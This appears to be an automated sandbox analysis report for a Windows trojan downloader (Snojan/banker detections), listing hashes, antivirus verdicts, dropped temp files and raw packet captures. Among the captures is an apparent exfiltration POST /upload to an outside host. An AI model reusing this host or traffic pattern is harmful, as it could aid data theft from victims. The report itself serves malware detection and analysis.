Analysis Date2018-04-17 21:46:33
MD55d92c65a7882b1a206a16b413b893a8a
SHA1680d5157871bd41bab6c490fa8fae2807823f1dd

Static Details:

File typePE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
PEhash
AVArcabit (arcavir)Trojan.GenericKD.30606265
AVAuthentiumW32/S-f9d51e84!Eldorado
AVGrisoft (avg)No Virus
AVAvira (antivir)TR/Spy.Banker.axzdc
AVAlwil (avast)Banker-LAA [Trj]
AVAd-AwareTrojan.GenericKD.30606265
AVBitDefenderTrojan.GenericKD.30606265
AVBullGuardTrojan.GenericKD.30606265
AVClamAVNo Virus
AVDr. WebTool.Snojan.1
AVEmsisoftTrojan.GenericKD.30606265
AVMicroWorld (escan)Application.Agent.BPO
AVCA (E-Trust Ino)No Virus
AVFortinetRiskware/Snojan
AVFrisk (f-prot)W32/S-f9d51e84!Eldorado
AVF-SecureTrojan.GenericKD.30606265
AVIkarusDownloader.Snojan
AVK7Trojan ( 0052706d1 )
AVKasperskyDownloader.Win32.Snojan.eiqu
AVMalwareBytesNo Virus
AVMcafeeGenericRXEO-OL!5D92C65A7882
AVMicrosoft Security EssentialsNo Virus
AVNANOTrojan.Win32.Snojan.evvppm
AVEset (nod32)No Virus
AVPadvishNo Virus
AVCAT (quickheal)Trojan.Snojan.S1829144
AVRisingNo Virus
AV360 SafeNo Virus
AVSUPERAntiSpywareNo Virus
AVSymantecSMG.Heur!gen
AVTrend MicroNo Virus
AVTwisterGenerik.HWSOMXU.ceqp
AVVirusBlokAda (vba32)Downloader.Snojan
AVWindows DefenderNo Virus
AVZillya!Trojan.GenericKD.Win32.100891

Runtime Details:

Screenshot

Process
↳ C:\Windows\System32\lsass.exe

Process
↳ C:\Users\Phil\AppData\Local\Temp\680d5157871bd41bab6c490fa8fae2807823f1dd.exe

Creates FileC:\Users\Phil\AppData\Local\Temp\680d5157871bd41bab6c490fa8fae2807823f1dd.exe
Creates FileC:\Users\Phil\AppData\Local\Temp\rifaien2-jVmkPdw9e2j603t7.exe
Creates FileC:\Users\Phil\AppData\Local\Temp\rifaien2-jVmkPdw9e2j603t7.exe

Network Details:


Raw Pcap
0x00000000 (00000)   47455420 2f6e6373 692e7478 74204854   GET /ncsi.txt HT
0x00000010 (00016)   54502f31 2e310d0a 436f6e6e 65637469   TP/1.1..Connecti
0x00000020 (00032)   6f6e3a20 436c6f73 650d0a55 7365722d   on: Close..User-
0x00000030 (00048)   4167656e 743a204d 6963726f 736f6674   Agent: Microsoft
0x00000040 (00064)   204e4353 490d0a48 6f73743a 20777777    NCSI..Host: www
0x00000050 (00080)   2e6d7366 746e6373 692e636f 6d0d0a0d   .msftncsi.com...
0x00000060 (00096)   0a                                    .

0x00000000 (00000)   47455420 2f6e6373 692e7478 74204854   GET /ncsi.txt HT
0x00000010 (00016)   54502f31 2e310d0a 436f6e6e 65637469   TP/1.1..Connecti
0x00000020 (00032)   6f6e3a20 436c6f73 650d0a55 7365722d   on: Close..User-
0x00000030 (00048)   4167656e 743a204d 6963726f 736f6674   Agent: Microsoft
0x00000040 (00064)   204e4353 490d0a48 6f73743a 20777777    NCSI..Host: www
0x00000050 (00080)   2e6d7366 746e6373 692e636f 6d0d0a0d   .msftncsi.com...
0x00000060 (00096)   0a                                    .

0x00000000 (00000)   504f5354 202f7570 6c6f6164 20485454   POST /upload HTT
0x00000010 (00016)   502f312e 310d0a48 6f73743a 20776563   P/1.1..Host: wec
0x00000020 (00032)   616e2e68 61737468 652e7465 63686e6f   an.hasthe.techno
0x00000030 (00048)   6c6f6779 0d0a4163 63657074 3a202a2f   logy..Accept: */
0x00000040 (00064)   2a0d0a43 6f6e7465 6e742d4c 656e6774   *..Content-Lengt
0x00000050 (00080)   683a2031 34323735 360d0a45 78706563   h: 142756..Expec
0x00000060 (00096)   743a2031 30302d63 6f6e7469 6e75650d   t: 100-continue.
0x00000070 (00112)   0a436f6e 74656e74 2d547970 653a206d   .Content-Type: m
0x00000080 (00128)   756c7469 70617274 2f666f72 6d2d6461   ultipart/form-da
0x00000090 (00144)   74613b20 626f756e 64617279 3d2d2d2d   ta; boundary=---
0x000000a0 (00160)   2d2d2d2d 2d2d2d2d 2d2d2d2d 2d2d2d2d   ----------------
0x000000b0 (00176)   2d2d2d2d 2d393132 61366532 35376131   -----912a6e257a1
0x000000c0 (00192)   35653065 350d0a0d 0a                  5e0e5....

0x00000000 (00000)   504f5354 202f3365 31363236 34372d63   POST /3e162647-c
0x00000010 (00016)   3364382d 34346333 2d393937 622d3061   3d8-44c3-997b-0a
0x00000020 (00032)   63396135 66363838 33322f20 48545450   c9a5f68832/ HTTP
0x00000030 (00048)   2f312e31 0d0a4361 6368652d 436f6e74   /1.1..Cache-Cont
0x00000040 (00064)   726f6c3a 206e6f2d 63616368 650d0a43   rol: no-cache..C
0x00000050 (00080)   6f6e6e65 6374696f 6e3a2043 6c6f7365   onnection: Close
0x00000060 (00096)   0d0a5072 61676d61 3a206e6f 2d636163   ..Pragma: no-cac
0x00000070 (00112)   68650d0a 436f6e74 656e742d 54797065   he..Content-Type
0x00000080 (00128)   3a206170 706c6963 6174696f 6e2f736f   : application/so
0x00000090 (00144)   61702b78 6d6c0d0a 55736572 2d416765   ap+xml..User-Age
0x000000a0 (00160)   6e743a20 57534441 50490d0a 436f6e74   nt: WSDAPI..Cont
0x000000b0 (00176)   656e742d 4c656e67 74683a20 3733330d   ent-Length: 733.
0x000000c0 (00192)   0a486f73 743a2031 39322e31 36382e31   .Host: 192.168.1
0x000000d0 (00208)   30302e31 34323a35 3335370d 0a0d0a3c   00.142:5357....<
0x000000e0 (00224)   3f786d6c 20766572 73696f6e 3d22312e   ?xml version="1.
0x000000f0 (00240)   30222065 6e636f64 696e673d 22757466   0" encoding="utf
0x00000100 (00256)   2d38223f 3e3c736f 61703a45 6e76656c   -8"?><soap:Envel
0x00000110 (00272)   6f706520 786d6c6e 733a736f 61703d22   ope xmlns:soap="
0x00000120 (00288)   68747470 3a2f2f77 77772e77 332e6f72   http://www.w3.or
0x00000130 (00304)   672f3230 30332f30 352f736f 61702d65   g/2003/05/soap-e
0x00000140 (00320)   6e76656c 6f706522 20786d6c 6e733a77   nvelope" xmlns:w
0x00000150 (00336)   73613d22 68747470 3a2f2f73 6368656d   sa="http://schem
0x00000160 (00352)   61732e78 6d6c736f 61702e6f 72672f77   as.xmlsoap.org/w
0x00000170 (00368)   732f3230 30342f30 382f6164 64726573   s/2004/08/addres
0x00000180 (00384)   73696e67 2220786d 6c6e733a 6c6d733d   sing" xmlns:lms=
0x00000190 (00400)   22687474 703a2f2f 73636865 6d61732e   "http://schemas.
0x000001a0 (00416)   6d696372 6f736f66 742e636f 6d2f7769   microsoft.com/wi
0x000001b0 (00432)   6e646f77 732f6c6d 732f3230 30372f30   ndows/lms/2007/0
0x000001c0 (00448)   38223e3c 736f6170 3a486561 6465723e   8"><soap:Header>
0x000001d0 (00464)   3c777361 3a546f3e 75726e3a 75756964   <wsa:To>urn:uuid
0x000001e0 (00480)   3a336531 36323634 372d6333 64382d34   :3e162647-c3d8-4
0x000001f0 (00496)   3463332d 39393762 2d306163 39613566   4c3-997b-0ac9a5f
0x00000200 (00512)   36383833 323c2f77 73613a54 6f3e3c77   68832</wsa:To><w
0x00000210 (00528)   73613a41 6374696f 6e3e6874 74703a2f   sa:Action>http:/
0x00000220 (00544)   2f736368 656d6173 2e786d6c 736f6170   /schemas.xmlsoap
0x00000230 (00560)   2e6f7267 2f77732f 32303034 2f30392f   .org/ws/2004/09/
0x00000240 (00576)   7472616e 73666572 2f476574 3c2f7773   transfer/Get</ws
0x00000250 (00592)   613a4163 74696f6e 3e3c7773 613a4d65   a:Action><wsa:Me
0x00000260 (00608)   73736167 6549443e 75726e3a 75756964   ssageID>urn:uuid
0x00000270 (00624)   3a666531 66363065 352d3733 30332d34   :fe1f60e5-7303-4
0x00000280 (00640)   3864622d 39333230 2d393031 38363964   8db-9320-901869d
0x00000290 (00656)   33643733 613c2f77 73613a4d 65737361   3d73a</wsa:Messa
0x000002a0 (00672)   67654944 3e3c7773 613a5265 706c7954   geID><wsa:ReplyT
0x000002b0 (00688)   6f3e3c77 73613a41 64647265 73733e68   o><wsa:Address>h
0x000002c0 (00704)   7474703a 2f2f7363 68656d61 732e786d   ttp://schemas.xm
0x000002d0 (00720)   6c736f61 702e6f72 672f7773 2f323030   lsoap.org/ws/200
0x000002e0 (00736)   342f3038 2f616464 72657373 696e672f   4/08/addressing/
0x000002f0 (00752)   726f6c65 2f616e6f 6e796d6f 75733c2f   role/anonymous</
0x00000300 (00768)   7773613a 41646472 6573733e 3c2f7773   wsa:Address></ws
0x00000310 (00784)   613a5265 706c7954 6f3e3c77 73613a46   a:ReplyTo><wsa:F
0x00000320 (00800)   726f6d3e 3c777361 3a416464 72657373   rom><wsa:Address
0x00000330 (00816)   3e75726e 3a757569 643a6462 32313261   >urn:uuid:db212a
0x00000340 (00832)   37332d38 6561632d 34636462 2d613962   73-8eac-4cdb-a9b
0x00000350 (00848)   352d6237 66323833 63633438 30613c2f   5-b7f283cc480a</
0x00000360 (00864)   7773613a 41646472 6573733e 3c2f7773   wsa:Address></ws
0x00000370 (00880)   613a4672 6f6d3e3c 6c6d733a 4c617267   a:From><lms:Larg
0x00000380 (00896)   654d6574 61646174 61537570 706f7274   eMetadataSupport
0x00000390 (00912)   2f3e3c2f 736f6170 3a486561 6465723e   /></soap:Header>
0x000003a0 (00928)   3c736f61 703a426f 64792f3e 3c2f736f   <soap:Body/></so
0x000003b0 (00944)   61703a45 6e76656c 6f70653e            ap:Envelope>


Strings